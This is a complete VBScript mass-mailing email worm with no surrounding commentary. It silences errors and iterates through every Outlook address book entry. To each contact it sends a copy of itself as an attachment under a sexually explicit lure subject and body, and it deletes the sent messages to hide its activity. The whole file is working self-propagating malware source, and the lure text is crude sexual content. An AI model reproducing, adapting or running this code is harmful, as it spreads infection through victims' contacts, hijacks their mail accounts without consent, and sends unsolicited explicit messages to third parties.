On Error Resume Next
Dim OL01, OL02, OL03, OL04, OL05
Dim RG01, RG02
Set OL01 = CreateObject( "Outlook.Application" )
Set OL02 = OL01.GetNameSpace( "MAPI" )
For Each OL03 In OL02.AddressLists
For OL04 = 1 To OL03.AddressEntries.Count
    Set OL05 = OL01.CreateItem( 0 )
      OL05.BCC = OL03.AddressEntries( OL04 ).Address
      OL05.Subject = "r u FEELING HORNY?  Do you feel like stroking it or rubbing it?"
    OL05.Body = "Well this should make you CUM in your pantz! I know its gonna make me CUM!  Quick Open your mouth!!mmmmmmm!"
       OL05.Attachments.Add WScript.ScriptFullName
        OL05.DeleteAfterSubmit = True
       OL05.Send
Next
Next
